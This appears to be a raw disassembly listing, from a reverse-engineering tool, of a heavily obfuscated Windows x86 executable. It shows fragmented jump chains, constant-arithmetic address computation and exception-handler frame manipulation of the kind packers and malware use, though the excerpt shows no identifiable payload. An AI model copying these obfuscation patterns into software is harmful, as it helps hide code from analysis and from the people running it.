sub_429F53 proc near ; CODE XREF: _0182ofla:loc_429F48�p
; FUNCTION CHUNK AT 004263D5 SIZE 00000005 BYTES
push ebp
mov ebp, esp
jmp loc_4263D5
sub_429F53 endp
; ---------------------------------------------------------------------------
test edx, 0BF81D480h
jmp loc_429032
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2EE
loc_429F66: ; CODE XREF: sub_42E2EE+C�j
jb loc_428D28
; END OF FUNCTION CHUNK FOR sub_42E2EE
; =============== S U B R O U T I N E =======================================
sub_429F6C proc near ; CODE XREF: sub_42C379:loc_429DE3�p
; FUNCTION CHUNK AT 0042ACA3 SIZE 00000021 BYTES
mov [esp+0], edx
pop edx
ror eax, 7
loc_429F73: ; CODE XREF: sub_42D897-8449�j
push edx
jmp loc_42ACA3
sub_429F6C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_429F79: ; CODE XREF: sub_429E52:loc_424169�j
jb loc_4237FE
push edx
mov ecx, edi
jmp loc_425520
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
loc_429F87: ; CODE XREF: _0182ofla:0042DAC2�j
add [ecx], al
add ecx, 4
mov dword ptr [ecx], offset loc_42C45C
xor eax, eax
pop ecx
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_429F99: ; CODE XREF: sub_42B15E+254C�j
jmp loc_42AEB1
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425063
loc_429F9E: ; CODE XREF: sub_425063+3F53�j
jmp loc_42AC84
; END OF FUNCTION CHUNK FOR sub_425063
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231D5
loc_429FA3: ; CODE XREF: sub_4231D5+19�j
jmp loc_425136
; END OF FUNCTION CHUNK FOR sub_4231D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A915
loc_429FA8: ; CODE XREF: sub_42A915-2C15�j
not edx
shl ebp, 9
or ebx, eax
jmp loc_42CC1F
; END OF FUNCTION CHUNK FOR sub_42A915
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_429FB4: ; CODE XREF: sub_4289E4:loc_42A877�j
call sub_42C2F0
loc_429FB9: ; CODE XREF: sub_42CC59+11�j
jmp loc_423A7E
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_429FBE: ; CODE XREF: sub_428F46+4�j
jmp loc_4250E4
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_429FC3: ; CODE XREF: sub_427445-3684�j
jmp loc_42D760
; END OF FUNCTION CHUNK FOR sub_427445
; =============== S U B R O U T I N E =======================================
sub_429FC8 proc near ; DATA XREF: sub_425471�o
; FUNCTION CHUNK AT 004284BC SIZE 00000005 BYTES
xchg eax, [esp+0]
mov eax, [esp+0]
push edx
push 7B6D2E4Bh
pop edx
jmp loc_4284BC
sub_429FC8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426649
loc_429FDA: ; CODE XREF: sub_426649+E�j
pop edx
add edx, 853438B3h
add eax, edx
pop edx
call sub_428D63
loc_429FE9: ; CODE XREF: _0182ofla:loc_429B24�j
add ecx, 4
mov dword ptr [ecx], offset loc_4239EF
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_426649
; =============== S U B R O U T I N E =======================================
sub_429FF9 proc near ; CODE XREF: _0182ofla:0042B787�p
push dword ptr fs:0
mov fs:0, esp
jmp loc_428B79
sub_429FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A00A proc near ; CODE XREF: sub_4242AC+A569�j
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_42D240
or eax, eax
jmp loc_4238E5
sub_42A00A endp
; =============== S U B R O U T I N E =======================================
sub_42A01E proc near ; DATA XREF: sub_42EB4E+8�o
pop ecx
push offset sub_42EC60
jmp loc_42D65D
sub_42A01E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425AB1
loc_42A029: ; CODE XREF: sub_425AB1:loc_427430�j
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
loc_42A032: ; CODE XREF: _0182ofla:00425F28�j
call sub_423F50
loc_42A037: ; CODE XREF: sub_42913D:loc_42915F�j
jmp loc_42A072
; END OF FUNCTION CHUNK FOR sub_425AB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_42A03C: ; CODE XREF: sub_4253DC-172F�j
jmp loc_429C93
; END OF FUNCTION CHUNK FOR sub_4253DC
; =============== S U B R O U T I N E =======================================
sub_42A041 proc near ; CODE XREF: _0182ofla:0042E45E�j
; _0182ofla:0042ED10�p
xchg ebx, [esp+0]
sub_42A041 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E689
loc_42A044: ; CODE XREF: sub_42E689-2FC8�j
pop ebx
call sub_42D71D
call sub_428D17
call sub_4291BA
jmp loc_42EBB7
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A059: ; CODE XREF: sub_42798F+4873�j
mov edx, [ebp-1Ch]
shr edx, 3
mov ecx, ds:dword_423190
push offset sub_42DD2A
jmp nullsub_192
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_42A06F: ; CODE XREF: sub_423861:loc_426BA9�j
mov eax, [ebp+var_4]
loc_42A072: ; CODE XREF: sub_425AB1:loc_42A037�j
cmp byte ptr [eax], 0EBh
jz loc_42A2ED
mov eax, [ebp+var_4]
mov al, [eax]
and al, 0F6h
jmp loc_424666
; END OF FUNCTION CHUNK FOR sub_423861
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A088: ; CODE XREF: _0182ofla:0042EAE5�j
jmp loc_42DCE3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B5CC
loc_42A08D: ; CODE XREF: sub_42B5CC+19�j
jmp loc_42E3E2
; END OF FUNCTION CHUNK FOR sub_42B5CC
; =============== S U B R O U T I N E =======================================
sub_42A092 proc near ; DATA XREF: sub_427CD0+3212�o
; FUNCTION CHUNK AT 00424DD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429E73 SIZE 0000000B BYTES
add eax, 0F638D6A9h
mov eax, [eax]
or eax, eax
jnz loc_424DD8
jmp loc_429E73
sub_42A092 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42A0A7: ; CODE XREF: sub_423FCD+A781�j
jz loc_42DC90
jmp loc_42B485
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42A0B2 proc near ; CODE XREF: _0182ofla:0042CE97�j
; sub_42DF61+5�p
; FUNCTION CHUNK AT 0042AD56 SIZE 0000000C BYTES
xchg ebx, [esp+0]
pop ebx
mov ebp, esp
push 164A9B43h
mov [esp+0], ecx
push 0FFFFFFF1h
jmp loc_42AD56
sub_42A0B2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, [ebp+0]
jmp sub_425C9C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42A0CF: ; CODE XREF: sub_4256D3+3�j
; sub_428D63-1FB�j ...
js loc_42A633
cmp dword ptr [ebp-4], 2
jnz loc_42ABE9
jmp loc_42DD25
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AC6
loc_42A0E4: ; CODE XREF: sub_429AC6+15�j
pop ecx
push eax
call sub_426561
mov ds:dword_42D214, eax
; END OF FUNCTION CHUNK FOR sub_429AC6
; START OF FUNCTION CHUNK FOR sub_425C55
loc_42A0F0: ; CODE XREF: sub_425C55+E�j
lea eax, [ebp-14h]
xor edx, edx
call sub_42B14D
; END OF FUNCTION CHUNK FOR sub_425C55
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42A0FA: ; CODE XREF: sub_425B6E+D�j
; sub_42AAF8+10�j
mov eax, ds:dword_42D214
jmp loc_4232BA
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
loc_42A104: ; CODE XREF: _0182ofla:004271EA�j
call sub_428FD6
call sub_4271D2
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42A111: ; CODE XREF: _0182ofla:00429125�j
jmp loc_429A30
; ---------------------------------------------------------------------------
loc_42A116: ; DATA XREF: sub_42660C:loc_42737D�o
call sub_42DF61
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42A11B: ; CODE XREF: sub_4271D2+44CA�j
jmp loc_42A701
; END OF FUNCTION CHUNK FOR sub_4271D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42A120: ; CODE XREF: sub_4282B8-183E�j
jmp loc_429926
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BEC
loc_42A125: ; CODE XREF: sub_429BEC:loc_4275F1�j
push 85C86502h
pop ebx
add ebx, 818DA6C4h
and ebx, 0F6E4F29h
xor ebx, 0CA9C69C7h
add ebx, ecx
add ebx, 32259DF1h
mov [ebx], eax
jmp loc_429816
; END OF FUNCTION CHUNK FOR sub_429BEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42A14C: ; CODE XREF: sub_428F20:loc_42B636�j
xchg ebx, [esp-4+arg_0]
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_4257A4, 0
jnz loc_424009
jmp loc_42A4B0
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
cmp edi, esi
jmp loc_426AF5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_118. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_42A16E: ; CODE XREF: sub_42A760+177�j
jmp loc_42C39A
; END OF FUNCTION CHUNK FOR sub_42A760
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA44
loc_42A173: ; CODE XREF: sub_42AA44+19�j
xchg ebx, [esp+0]
jmp sub_42D71D
; END OF FUNCTION CHUNK FOR sub_42AA44
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_94. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42A17C: ; CODE XREF: sub_428D63-18E4�j
jmp loc_4257DA
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_42A181 proc near ; CODE XREF: sub_42E2EE�p
; FUNCTION CHUNK AT 0042484C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425A06 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427730 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429930 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A61B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042DCFB SIZE 00000005 BYTES
push large dword ptr fs:0
mov large fs:0, esp
mov eax, large fs:20h
jmp loc_425A06
sub_42A181 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429ED3
loc_42A19B: ; CODE XREF: sub_429ED3+5�j
pop eax
rol eax, 1
add eax, 4588B5AFh
retn
; END OF FUNCTION CHUNK FOR sub_429ED3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E90
loc_42A1A6: ; CODE XREF: sub_427E90+14�j
jmp loc_427F9F
; END OF FUNCTION CHUNK FOR sub_427E90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276BF
loc_42A1AB: ; CODE XREF: sub_4276BF+1F�j
jmp loc_424C24
; END OF FUNCTION CHUNK FOR sub_4276BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_42A1B0: ; CODE XREF: sub_425DA5+183F�j
call sub_423FCD
jmp loc_426B0A
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_42A1BA: ; CODE XREF: sub_42CA29:loc_427DCC�j
jmp sub_42D730
; END OF FUNCTION CHUNK FOR sub_42CA29
; ---------------------------------------------------------------------------
call sub_4230C4
; START OF FUNCTION CHUNK FOR sub_42CE60
loc_42A1C4: ; CODE XREF: sub_42CE60+7�j
jmp loc_42934D
; END OF FUNCTION CHUNK FOR sub_42CE60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42A1C9: ; CODE XREF: sub_4282B8+48ED�j
jmp nullsub_210
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_42A1CE: ; CODE XREF: sub_425C89:loc_42AEF7�j
jz loc_423C40
jmp loc_428681
; END OF FUNCTION CHUNK FOR sub_425C89
; =============== S U B R O U T I N E =======================================
sub_42A1D9 proc near ; CODE XREF: _0182ofla:0042438F�j
; _0182ofla:0042A288�p
; FUNCTION CHUNK AT 0042C1AD SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
jnz loc_423CED
mov eax, [ebp-4]
mov [ebp-8], eax
jmp loc_42C1AD
sub_42A1D9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A1EE: ; CODE XREF: _0182ofla:0042A275�j
add esp, 0FFFFFFF4h
mov [ebp-8], edx
call sub_425DA5
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A1F9: ; CODE XREF: sub_42798F+2C33�j
jmp loc_429D98
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430D
loc_42A1FE: ; CODE XREF: sub_42430D+19�j
jge loc_42A555
; END OF FUNCTION CHUNK FOR sub_42430D
; START OF FUNCTION CHUNK FOR sub_429203
loc_42A204: ; CODE XREF: sub_429203+A�j
jmp loc_42CDAE
; END OF FUNCTION CHUNK FOR sub_429203
; ---------------------------------------------------------------------------
loc_42A209: ; CODE XREF: _0182ofla:0042354F�j
jmp loc_4247B5
; ---------------------------------------------------------------------------
sub esi, 8A5A49A3h
jmp loc_42A552
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_42A219: ; CODE XREF: sub_428F46:loc_423D28�j
add eax, 890675A1h
mov eax, [eax]
or eax, eax
jnz loc_425731
jmp loc_425998
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42A22E: ; CODE XREF: sub_42798F:loc_42AFDF�j
add ebx, edx
sub ebx, edx
jmp loc_42CBE6
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B500
loc_42A237: ; CODE XREF: sub_42B500:loc_42AE50�j
call sub_4269D9
loc_42A23C: ; CODE XREF: sub_42DDA6-5D83�j
jmp nullsub_89
; END OF FUNCTION CHUNK FOR sub_42B500
; =============== S U B R O U T I N E =======================================
sub_42A241 proc near ; CODE XREF: sub_428F20-309F�p
; _0182ofla:004275D3�j
; FUNCTION CHUNK AT 004231C2 SIZE 00000012 BYTES
mov [esp+0], ebx
pop ebx
add eax, 2DAA7713h
call sub_42B14D
lea eax, [ebp-14h]
push eax
jmp loc_4231C2
sub_42A241 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
adc edx, ebp
jmp sub_42C7FE
; =============== S U B R O U T I N E =======================================
sub_42A260 proc near ; CODE XREF: sub_423077+A�p
; _0182ofla:00427E65�j
; FUNCTION CHUNK AT 00423D82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426D0C SIZE 00000001 BYTES
xchg edx, [esp+0]
pop edx
add edx, ebp
add edx, 0D2288F3Eh
mov [edx], eax
jmp loc_423D82
sub_42A260 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42A273: ; DATA XREF: sub_42B14D+1�o
mov ebp, esp
jnz loc_42A1EE
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
cmp dword ptr [ebp-8], 0
call sub_42A1D9
loc_42A28D: ; DATA XREF: sub_423A2A:loc_4269B2�o
push ecx
push 7E3D6674h
pop ecx
and ecx, 913F1489h
add ecx, 0F0058AD5h
jmp loc_425354
; ---------------------------------------------------------------------------
mov [edx], edi
jmp sub_4294AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42A2AC: ; CODE XREF: sub_42537E+2097�j
mov [ebx], ecx
jmp loc_428145
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
or ecx, 0AD15A138h
jmp sub_425BED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_42A2BE: ; CODE XREF: sub_42B1F9-D0D�j
jnz loc_423F7E
loc_42A2C4: ; CODE XREF: sub_42B1F9:loc_424528�j
call nullsub_201
retn
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C68
loc_42A2CA: ; CODE XREF: sub_429C68+7�j
jmp loc_42E70E
; END OF FUNCTION CHUNK FOR sub_429C68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D430
loc_42A2CF: ; CODE XREF: sub_42D430-6AA2�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_42D430
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A2D5: ; CODE XREF: _0182ofla:004245AD�j
jmp locret_424B46
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_203. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427762
loc_42A2DB: ; CODE XREF: _0182ofla:004289BF�j
; sub_427762+6482�j
jmp nullsub_232
; END OF FUNCTION CHUNK FOR sub_427762
; ---------------------------------------------------------------------------
loc_42A2E0: ; CODE XREF: _0182ofla:004233E7�j
jmp sub_429AA3
; ---------------------------------------------------------------------------
loc_42A2E5: ; CODE XREF: _0182ofla:0042A665�j
; DATA XREF: sub_423861:loc_429870�o
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_42A2E8: ; CODE XREF: sub_42AAF8-659E�j
jmp loc_425B66
; END OF FUNCTION CHUNK FOR sub_42AAF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_42A2ED: ; CODE XREF: sub_423861+3AEF�j
; sub_423861+3B03�j ...
mov al, 1
jmp loc_42E04C
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
loc_42A2F4: ; CODE XREF: _0182ofla:0042A416�j
add ebx, 3F53B4B0h
; =============== S U B R O U T I N E =======================================
sub_42A2FA proc near ; CODE XREF: sub_42B182+C�p
; FUNCTION CHUNK AT 00427297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A84B SIZE 00000003 BYTES
mov [esp+0], edi
pop edi
add ecx, 1E23923Ch
mov ecx, [ecx]
and ecx, 7
mov al, 1
shl al, cl
jmp loc_427297
sub_42A2FA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42892E
loc_42A312: ; CODE XREF: sub_42892E+6�j
push offset sub_4288BB
jmp loc_42AD93
; END OF FUNCTION CHUNK FOR sub_42892E
; ---------------------------------------------------------------------------
loc_42A31C: ; CODE XREF: _0182ofla:0042D67E�j
push offset loc_42B1D6
jmp loc_42A947
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_42A326: ; CODE XREF: sub_427DA9+3813�j
mov eax, ebx
jl loc_42502E
loc_42A32E: ; CODE XREF: sub_427DA9:loc_423B7B�j
pop large dword ptr fs:0
add esp, 4
push offset sub_424E00
jmp loc_428B74
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
loc_42A342: ; CODE XREF: _0182ofla:00424FA3�j
pushf
; =============== S U B R O U T I N E =======================================
sub_42A343 proc near ; CODE XREF: _0182ofla:00428DAD�p
mov [esp+0], eax
sub_42A343 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_42A346: ; CODE XREF: sub_42CA29:loc_42C729�j
pop eax
mov eax, [ebp-4]
push eax
call sub_4278DB
jmp loc_427DCC
; END OF FUNCTION CHUNK FOR sub_42CA29
; ---------------------------------------------------------------------------
cmp edi, eax
jmp loc_4291A2
; ---------------------------------------------------------------------------
loc_42A35C: ; CODE XREF: _0182ofla:00427033�j
jb loc_42E66B
or ebp, eax
; =============== S U B R O U T I N E =======================================
sub_42A364 proc near ; CODE XREF: sub_42B15E-7997�p
xchg ecx, [esp+0]
pop ecx
add eax, 0D27C4016h
add eax, ebp
add eax, 2D82B496h
loc_42A376: ; CODE XREF: sub_423114+34D7�j
mov eax, [eax]
jmp loc_427A38
sub_42A364 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7FE
loc_42A37D: ; CODE XREF: sub_42C7FE+14�j
mov dword ptr [ebp-18h], 0
loc_42A384: ; CODE XREF: sub_4240FC+48DD�j
mov eax, [ebp-4]
mov edx, [ebp-14h]
add eax, [edx+20h]
xor edx, edx
push edx
loc_42A390: ; CODE XREF: sub_428729:loc_42360A�j
jmp loc_428F09
; END OF FUNCTION CHUNK FOR sub_42C7FE
; ---------------------------------------------------------------------------
db 9Bh, 0FBh, 7Fh
dword_42A398 dd 77EB36A5h ; DATA XREF: _0182ofla:0042751E�w
; sub_42B07D�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42A39C: ; CODE XREF: sub_423A2A+7A71�j
jmp loc_427BC3
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42A3A1: ; CODE XREF: sub_42D056-6C97�j
jmp loc_42D864
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
dw 56F6h
dword_42A3A8 dd 0 ; DATA XREF: sub_428D17+C�o
; sub_42D76D+3�o ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_42A3AC: ; CODE XREF: sub_42349B+5047�j
jmp loc_425535
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
db 0E9h, 0EAh, 8Dh
dword_42A3B4 dd 77E60000h ; DATA XREF: sub_42798F+1DC4�r
; sub_42A5FC:loc_42A606�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_42A3B8: ; CODE XREF: sub_42C415-72F4�j
jmp loc_425551
; END OF FUNCTION CHUNK FOR sub_42C415
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_42A3BD: ; CODE XREF: sub_4295D6-5640�j
jmp loc_427290
; END OF FUNCTION CHUNK FOR sub_4295D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_42A3C2: ; CODE XREF: sub_42AB3E-76A8�j
jmp loc_4235D8
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
db 5Fh
dword_42A3C8 dd 6E93656Dh, 19338D95h, 0C66C8C5Ch ; DATA XREF: sub_423057�o
; sub_423A2A:loc_428501�o
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42A3D5: ; CODE XREF: sub_423FCD+68EB�j
jmp loc_428E1A
; END OF FUNCTION CHUNK FOR sub_423FCD
; =============== S U B R O U T I N E =======================================
sub_42A3DA proc near ; DATA XREF: _0182ofla:004240C1�o
pop edx
mov esp, ebp
pop ebp
sub_42A3DA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42A3DF: ; CODE XREF: sub_42326C+1544�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_42326C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42A3E4 proc near ; CODE XREF: sub_424A70+6�p sub_428AE1�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00428E9F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A988 SIZE 00000005 BYTES
push ebp
mov ebp, esp
call sub_429AE0
loc_42A3EC: ; CODE XREF: sub_42349B+A56D�j
jmp loc_428E9F
sub_42A3E4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426BDA
loc_42A3F1: ; CODE XREF: sub_426BDA:loc_428399�j
mov eax, ds:dword_42E8C4
or eax, eax
jnz loc_42832E
push offset loc_42508C
jmp loc_42B4EE
; END OF FUNCTION CHUNK FOR sub_426BDA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E6A
loc_42A409: ; CODE XREF: sub_426E6A+76A7�j
add ecx, ebp
jmp loc_425D30
; END OF FUNCTION CHUNK FOR sub_426E6A
; ---------------------------------------------------------------------------
jl loc_426298
jmp loc_42A2F4
; ---------------------------------------------------------------------------
loc_42A41B: ; CODE XREF: _0182ofla:0042C7DD�j
mov eax, 7B2A3475h
; =============== S U B R O U T I N E =======================================
sub_42A420 proc near ; CODE XREF: sub_426B83+3�p
; FUNCTION CHUNK AT 00424202 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427215 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427781 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428079 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00428085 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C493 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042C865 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E058 SIZE 0000000B BYTES
mov [esp+0], edx
pop edx
push ecx
mov esp, ebp
pop ebp
loc_42A428: ; CODE XREF: _0182ofla:loc_42D86F�j
mov eax, ds:dword_42E8C0
or eax, eax
jmp loc_427215
sub_42A420 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A436: ; CODE XREF: _0182ofla:0042ADFA�j
xchg ebx, eax
; =============== S U B R O U T I N E =======================================
sub_42A438 proc near ; CODE XREF: sub_42C6EB+7�p
; FUNCTION CHUNK AT 0042B3B8 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov large fs:0, esp
jmp loc_42B3B8
sub_42A438 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA65
loc_42A448: ; CODE XREF: sub_42DA65+6�j
mov fs:0, esp
jmp loc_426431
; END OF FUNCTION CHUNK FOR sub_42DA65
; ---------------------------------------------------------------------------
not edx
jmp sub_42C2F0
; ---------------------------------------------------------------------------
locret_42A45A: ; CODE XREF: _0182ofla:00424135�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_42A45B: ; CODE XREF: sub_428AC9+627B�j
jmp loc_429CF6
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
loc_42A460: ; CODE XREF: _0182ofla:00424126�j
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
jnz loc_42CA3F
add dword ptr [ebp-8], 4
jmp loc_4254C9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4C6
loc_42A477: ; CODE XREF: sub_42A4C6+2B07�j
jmp locret_42981B
; END OF FUNCTION CHUNK FOR sub_42A4C6
; ---------------------------------------------------------------------------
cmp ebx, 6B82E885h
jmp loc_427961
; ---------------------------------------------------------------------------
loc_42A487: ; CODE XREF: _0182ofla:loc_42DA60�j
xor esi, 0AC5E7CDFh
add esi, 0E7B4F0CCh
add edx, esi
pop esi
mov edx, [edx]
push edx
push ebp
jmp loc_4242DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_42A49F: ; CODE XREF: sub_42E689+8�j
jz loc_4250DA
jmp loc_42B6BB
; END OF FUNCTION CHUNK FOR sub_42E689
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A4AB: ; CODE XREF: _0182ofla:0042D26F�j
jmp loc_42B812
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
